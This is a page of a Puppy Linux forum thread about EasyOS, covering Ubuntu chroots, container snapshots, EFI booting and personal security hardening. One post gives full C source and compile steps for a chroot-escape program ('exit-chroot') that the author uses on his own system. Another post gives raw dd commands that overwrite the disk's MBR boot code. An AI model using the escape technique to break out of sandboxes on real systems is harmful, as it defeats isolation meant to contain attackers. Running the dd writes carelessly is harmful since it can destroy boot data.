Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Sat 23 Feb 2019, 22:46
All times are UTC - 4
 Forum index » Advanced Topics » Puppy Derivatives
EasyOS 1.0.8, February 20, 2019
Moderators: Flash, JohnMurga
Post new topic   Reply to topic View previous topic :: View next topic
Page 91 of 92 [1379 Posts]   Goto page: Previous 1, 2, 3, ..., 89, 90, 91, 92 Next
Author Message
don570


Joined: 10 Mar 2010
Posts: 5262
Location: Ontario

PostPosted: Thu 07 Feb 2019, 15:11    Post subject:  

Note to BarryK...

I found it hard to track down the Easy linux explanation...

For instance I googled...

ibiblio + how easy works

and got this bad link

http://barryk.org/easy/how-easy-works.htm

The correct link would be

https://easyos.org/tech/how-easy-works.html

_____________________________________________
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Thu 07 Feb 2019, 20:48    Post subject:  

EasyOS sfs's are not the same as puppy sfs's. You need multiple files such as this
specs file and the main sfs file (174MB).

For a frugal install, download and store them in the sfs folder, something like /mnt/sda1/easy/1.0/sfs/easyos/oe/pyro ... alongside other sfs's (easypak's).

Then Menu, System, Bootmanager configure bootup ... and use the first/topmost button to list the sfs's available and check/tick the box for, in this case, the stretch sfs choice. You then need to reboot for that to be loaded.

The above sfs is a chroot for Ubuntu x86_64. I've included a overview of how that was created in the root folder of that chroot. Once loaded open a terminal and cd / and then chroot ubun .. and press the tab button to auto complete the rest (rather than having to type the long folder name). Press Enter ... and you'll be chroot into that Ubuntu environment (terminal).

That has apt-get, so you can for instance apt-get audacity ... or any other ubuntu program/package, and it will be installed into that chroot. I've already done that for audacity in the above sfs. To run that audacity, make sure the easy container is already running (i.e. that runs on DISPLAY=:1) and inside the chroot simply run

DISPLAY=:1 audacity

and then switch to the easy container desktop (window) and you should see audacity. Sound plays fine in that for me.

Same for any other ubuntu programs/packages. Just apt-get them inside the Ubuntu chroot and run them on your easy desktop. You could for instance (its generally best to run apt-get update first)
apt-get update
apt-get galculator
and once that's installed then
DISPLAY=:1 galculator
... or whatever.

Synaptic would be a good one to install (apt-get install synaptic), as then you could run the snyaptic gui
DISPLAY=:1 synaptic
... and use that to find/select/install programs.

Be mindful that whilst the programs such as audacity are running on the easy desktop (container), they're not actually contained, its actually being run from the real root desktop, but within a chroot (so there's a degree of security, but not the full blown easy container security).

Opens up a wider choice of available programs that can be run within EasyOS Smile

PS : Reminder that any files you want to work on inside the Ubuntu chroot such as /root/myaudio.mp3 are accessed from the main Easy OS (real root) desktop as /ubuntu-86x64-chroot-with-audacity_1.0/root/myaudio.mp3 i.e. the chroot main top folder name has to be used, but within the chroot (terminal window) its just /root/myaudio.mp3.
audacity.png
 Description   
 Filesize   159.66 KB
 Viewed   965 Time(s)

audacity.png


_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Thu 07 Feb 2019, 23:03    Post subject:  

In that ubuntu chroot I installed dosbox and then unzipped a old win31 program I still use periodically (support ended, but its a great program for stock timing). Un(surprisingly) ... it worked. EasyOS running Ubuntu running dos, running Win31 Smile
_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 8830
Location: Perth, Western Australia

PostPosted: Fri 08 Feb 2019, 07:15    Post subject:  

Exploration of minibase is continuing. Have pretty much got ethernet networking sorted out:

http://bkhome.org/news/201902/basic-ethernet-setup-with-minibase.html

_________________
http://bkhome.org/news/
Back to top
View user's profile Send private message Visit poster's website 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Fri 08 Feb 2019, 08:21    Post subject:  

Sharing the same DISPLAY=:1 for the Easy container and running Ubuntu chroot did have too small a font size for my liking, so in the Ubuntu chroot I installed cwm (openbsd-cwm) and set up ctrl-alt-F2 to run another X
X :2 -dpi 144 vt2 & (run in Easy main system terminal)
and then ran cwm on that (command run from inside the Ubuntu chroot)
DISPLAY=:2 export DISPLAY
openbsd-cwm &
audacity &
... and the font size within that is more to my liking (full screen audacity running under cwm)
(clickable thumbnail)

I have run the easy container on a different desktop (ctrl-alt-F3) using a similar approach, so I could for instance have ctrl-alt-F1 for root/cli (tmux), ctrl-F2 for Ubuntu, ctrl-alt-F3 for the easy container and ctrl-alt-F4 for the Easy main system. With each having their own advantages/disadvantages (tmux for its interconnections (ssh into other boxes), Ubuntu for its repositories/ease of installing things, easy container for browser/security/isolation ... and the main EasyOS system for admin).

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sat 09 Feb 2019, 15:16    Post subject:  

BarryK wrote:
Exploration of minibase is continuing. Have pretty much got ethernet networking sorted out:

http://bkhome.org/news/201902/basic-ethernet-setup-with-minibase.html

unwind ... looks interesting http://www.undeadly.org/cgi?action=article;sid=20190128061321

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sat 09 Feb 2019, 22:02    Post subject:  

In my remastered version ... that now includes audacity and vlc http://murga-linux.com/puppy/viewtopic.php?p=1017693#1017693, interesting to see the different sizes of the EasyOS sfs

high xz compressed easy sfs : 435MB
normal (gzip) compressed : 543MB
lzo level 1 compressed : 659MB (what I'm running as its very snappy and a frugal HDD install so space isn't a issue)
Uncompressed : 1636MB

Rounds core EasyOS off nicely for me. I like audacity for its noise filtering and amplification/attenuation functions (adjust mp3's to similar sound levels). VLC is nice for its ease of recording parts of a video you're watching. Makes the Multimedia menu just that more complete IMO.


Clickable thumbnail

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sun 10 Feb 2019, 17:38    Post subject:  

Barry, I've added a please wait... to ec rollback (and a $0 & prior to exit so it loops back around to the dialog again). When a containers save grows to 100MB+ sfs size it can take 5 seconds or so to complete a rollback. As-is with just exiting (no information shown), you can open the container before the rollback has completed, with unpredictable results (and I'd guess potentially corrupt the save area).

i.e. click container rollback button ... the window just closes. Immediately click ec container desktop icon to launch the container, and the rollback copies might still be perhaps just half way through having actually copied the sfs being rolled back (restored) into the save space (folders).

As I frugal (HDD) boot EasyOS, for me the size of container snapshots (sfs) isn't a issue and using rsync to backup/restore container snapshots is very fast (compared to mksquashfs to create a snapshot and mounting that sfs to copy out its contents in order to restore it).

My other option, of just simply moving or copying the .session folder from the cli, when using mc has its own progress indicator as attached (actual fbgrab snapshot of the console).
c.png
 Description   
 Filesize   10.23 KB
 Viewed   369 Time(s)

c.png


_________________
( ͡° ͜ʖ ͡°) :wq

Last edited by rufwoof on Wed 13 Feb 2019, 16:27; edited 1 time in total
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Mon 11 Feb 2019, 15:42    Post subject:  

What's quite nice, and very quick, is instead of creating and restoring snapshots of the Easy container, is to just have versions of the container - copies of the .session folder tree.

If instead of creating a sfs copy of the containers save area you just rename (mv) the .session folder (mv .session .session.v1), then the next run has no .session folder (as it was moved to another folder name) so it creates a new clean/fresh .session folder. Restoring a version is again just a mv (removing the current .session beforehand, but a seemingly (for the user) faster way is to just mv the current .session, mv in the .session version being restored and then background remove the one that is no longer needed. Being on the same partition, those moves are near instantaneous (just a inode pointer update). Creating and reactivating versions seems to the user to be near instantaneous. Activate version type action.

For cases of where the Easy container were large, perhaps 1GB of changes/additions having been made, then the Activate (mv) action is far far quicker than creating or restoring snapshots using squashfs. Different versions with relevant data applicable to different clients for instance (and/or different sets of programs installed).

Attached image is a first time/novice user of the "dia" menu option.
Diagram1.png
 Description   
 Filesize   44.14 KB
 Viewed   568 Time(s)

Diagram1.png


_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Tue 12 Feb 2019, 10:52    Post subject:  

See also this (and other) posts in http://murga-linux.com/puppy/viewtopic.php?p=1018236#1018236

When the system boots a small cli linux environment is loaded, predominately busybox based, that then prepares the main system and switch roots into that. That act of switch rooting in effect vapourises that initial boot version. If however you modify the initial boots init to use chroot instead of switch root (I also commented out the umounting of sys and proc near the end of init), then you can hack out of that chroot i.e. main system/desktop, back into that small initial init boot area. Back in that you can for instance modify the main sessions save area (.session content), perhaps even fully replace it ... and then chroot back into it again and 'see' those changes.

The last handful of lines or so of my init (inside initrd) now looks like
Code:
mount -t devtmpfs devtmpfs /easy_new/dev #need to do this before switch_root.
sync
#umount /sys
#umount /proc
exec chroot /easy_new /sbin/init

###END###


The exit-chroot.c hack that I used to exit the chroot looks like (load devx.sfs and compiled with gcc exit-chroot.c -o exit-chroot;chmod +x exit-chroot)
Code:
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);
    for(x = 0; x < 1000; x++) chdir("..");
    chroot(".");
    return execl("/bin/busybox", "sh", NULL);
}

(I've attached a pre compiled (under EasyOS 1.0) version of that - a actual .gz file so gzip -d exit-chroot.gz after downloading)

Such a approach could for instance eliminate having to reboot after rolling back a main session to a different snapshot, instead it could exit-chroot, apply the changes and then chroot back in again.

Before running exit-chroot I Menu, Shutdown, Exit to command line ... and then run the exit-chroot program as above. Interestingly if you run it in the main desktop gui within a terminal window, then that window contains the small initial init cli, but the main desktop/gui system also remains functional.
exit-chroot.gz
Description 
gz

 Download 
Filename  exit-chroot.gz 
Filesize  3.95 KB 
Downloaded  7 Time(s) 

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
wdt

Joined: 27 Dec 2011
Posts: 38

PostPosted: Tue 12 Feb 2019, 16:17    Post subject:  

I decided to give easy a try, seems to work OK, even network manager,, BUT
it is a bit lacking and specifically this
I reflashed the firmware on a ryzen mb, and powered off and reloaded defaults
It had lost the ESP and nothing I could do would get it back
All it could boot was win(32bit) and easy,, BUT easy does NOT have efibootmgr
(and win is useless, even if it was an efi version, which it was not)
Eventually I made a refind usb stick and used efi shell and bcfg
Maybe if unplugged every drive except for the one with the ESP the firmware might have found it???
Anyway, if efibootmgr is too big, put efi shell and add a stanza to refind.conf
Sometimes, even if rarely, you need to deal with that, if nothing more than adjusting boot order
I could not find it with pup-get (efibootmgr)
I use refind as bootmgr, when it merges the easy ESP the icon is 3 paint cans,
you can pretty it by copying whatever icon to the easy ESP/EFI/BOOT/
and renaming it to BOOTX64.PNG (it has to the "right" kind of icon of course)
ie cd /boot/efi/EFI/BOOT/icons; cp os_easy.png ../BOOTX64.PNG
Back to top
View user's profile Send private message 
greengeek


Joined: 20 Jul 2010
Posts: 5411
Location: Republic of Novo Zelande

PostPosted: Wed 13 Feb 2019, 01:36    Post subject:  

Is the following link of any concern with regard to Easy's use of containers?

https://nakedsecurity.sophos.com/2019/02/12/linux-container-bug-could-eat-your-server-from-the-inside-patch-now
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Wed 13 Feb 2019, 13:29    Post subject:  

greengeek wrote:
Is the following link of any concern with regard to Easy's use of containers?

https://nakedsecurity.sophos.com/2019/02/12/linux-container-bug-could-eat-your-server-from-the-inside-patch-now

Short answer, no.

That link highlights a flaw in runc that involves obtaining root cli inside, and using that to break out of the container. EasyOS easy container runs as root inside the container, but where capabilities are dropped (to the extent root inside the container is comparable to a restricted user) so even if a remote hacker achieves root cli they cannot break out of the container (chroot capabilities are dropped - and chrooting out of a container is the typical method to break out of the container. I posted such a exit-chroot a few posts earlier that enables breaking out of EasyOS main session back into the initrd cli (when the main session is started using chroot instead of switch root), but that code fails inside the easy container (lack of chroot capabilities)).

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sat 16 Feb 2019, 16:53    Post subject: Making a partition inaccessible to real root gui desktop  

In follow up
A neat trick if you launch the main session using chroot rather than switch_root is that you can mount a partition from within the initial init before chrooting (init, within initrd)

.
.
mkdir -p /mnt/sda3
mount /dev/sda3 /mnt/sda3
exec chroot easy_new

... so that sda3 partition is already mounted ... to a mount point that is inaccessible to the main X/gui desktop real root session. So you boot to the normal/full root desktop, can see sda3 listed as a drive icon in the bottom left, but you can't mount or access the content of that, even though you are (full/real) root.

If you then exit X (to command line), and run exit-chroot (so you're back into the initial/small root cli) and then restart the main session again, but disabling chroot

capsh --drop=cap_sys_chroot --chroot=/easy_new --

then you can restart the X desktop again, but you can't even chroot back out of that. That does however also mean you can't launch any containers - as they depend upon chroot.

Whilst you can't access sda3 (in this example) via the main/real root desktop, you can ctrl-alt-Fn into another terminal session, login as root and exit-chroot from that, which then opens up /mnt/sda3 content (and you could copy files to/from that into the main desktop session i.e. cp /mnt/sda3/somefile.txt /easy_new/root/somefile.txt
(having something like mc within the initial init would be useful for such copying of files around **A)).

Even if the X desktop is hacked, then they can't access the initial/small cli - so can't get access to sda3, as the kernel has dropped chroot permissions (capsh). Only local access can gain access to sda3.

EDIT: **A ... Copied the mc bin into initrd's /bin, did a ldd on mc and copied the indicated libs over to the initrd's /lib, copied /usr/share/mc to the same in the initrd's (also copied /usr/share/mc and /mnt/wkg/home/mcedit ... and several other mc config files (filepos, history, ini, panels.ini, Tree)) ... and providing you TERM=linux export TERM before running mc within the initrd it all seems to work. initrd is now 11MB. A series of snaps ,,, in a pdf file (fake .gz, rename it without that) Actual tty snaps were taken using fbgrab. I've had to compress down the pdf so it could be uploaded so quality of the images are just just modest.
LQ-system-layout_reduce.pdf.gz
Description 
gz

 Download 
Filename  LQ-system-layout_reduce.pdf.gz 
Filesize  187.39 KB 
Downloaded  15 Time(s) 

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Mon 18 Feb 2019, 15:40    Post subject:  

Further Security Hardening (my remastered version of) EasyOS
=======================================================

Personally I like to consider security from the angle that our home network is just as insecure as using our local libraries or any other network. Accordingly to use that untrusted network a pristine clean OS and system pre-configured to as-desired is the best approach. Accordingly I don't like to save potentially dubious sessions across reboots. For my EasyOS HDD frugal installed setup I've modified EasyOS so that my sda3 (data) partition is mounted within initrd (init), as that way once mounted the chroot (that I use instead of switch-root) cannot access that mount point, nor mount sda3 as its already mounted. ctrl-alt-F1 (console cli) can however exit-chroot into the initrd's cli (I have mc installed in that to aid in moving files between sda3 and the main or easy containers areas). To 'get to' that sda3 a remote hacker has to break out of the Easy container and get to the main (real) root, and then break out of that real root into the initrd level cli (as not even real root in the main session can access sda3). A high enough series of hurdles for comfort.

I have my EasyOS setup to that it boots to initrd's init cli, and running startx from that loads up a init level mc (cli file manager) on ctrl-alt-F1, the main real root X desktop on ctrl-alt-f4 (when started the easy container X desktop loads to ctrl-alt-f3). So basically after booting I have initrd cli running mc on ctrl-alt-F1 (CA1), the main real root X on CA4 and the Easy container on CA3, with the intent that the bios boot code and grldr loader have been verified as clean, along with rolling back to known clean versions of the main system and easy container after each boot. As part of further hardening ...

BIOS
====

The MBR is basically a 512 byte segment on the very first sector of your hard drive and it is composed of 3 parts: the boot code (446 bytes long), the partition table (64 bytes long) and the boot code signature (2 bytes long).

To backup the boot code itself and nothing else:
Code:
# dd if=/dev/sda of=/tmp/mbr.img_backup bs=446 count=1

and restore with
Code:
# dd if=/tmp/mbr.img_backup of=/dev/sda bs=446 count=1

Also check the partition table and boot code signature i.e. as above, but using 512 instead of 446

sda1's grldr (file) should be checked (loader),

We can record diffs or checksums for the purpose of ensuring integrity

OS
==

Booting the same known clean OS and Easy Container
Code:
/mnt/sda1/easy/easyremastered/.session/.rollback.flg
format
,YYYYMMDDHHMM

i.e.
Code:
,201902181247

Restores for example ...
Code:
/mnt/sda1/easy/easyremastered/releases/easy-1.0/rw-201902181247.sfs

Which can be checksum or diff validated from records kept on sda3

Once (re)booted to a clean main system, can use the desktop easy containers manager to restore the Easy container, but to also ensure that hasn't been changed we checksum, diff or copy in our own known clean version ...

Container restored from for example
Code:
/mnt/sda1/easy/easyremastered/containers/easy/rw-201902180100.sfs

again using checksum or diff checked versions

_________________
( ͡° ͜ʖ ͡°) :wq
Back to top
View user's profile Send private message 
Display posts from previous:   Sort by:   
Page 91 of 92 [1379 Posts]   Goto page: Previous 1, 2, 3, ..., 89, 90, 91, 92 Next
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Advanced Topics » Puppy Derivatives
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.1430s ][ Queries: 13 (0.0241s) ][ GZIP on ]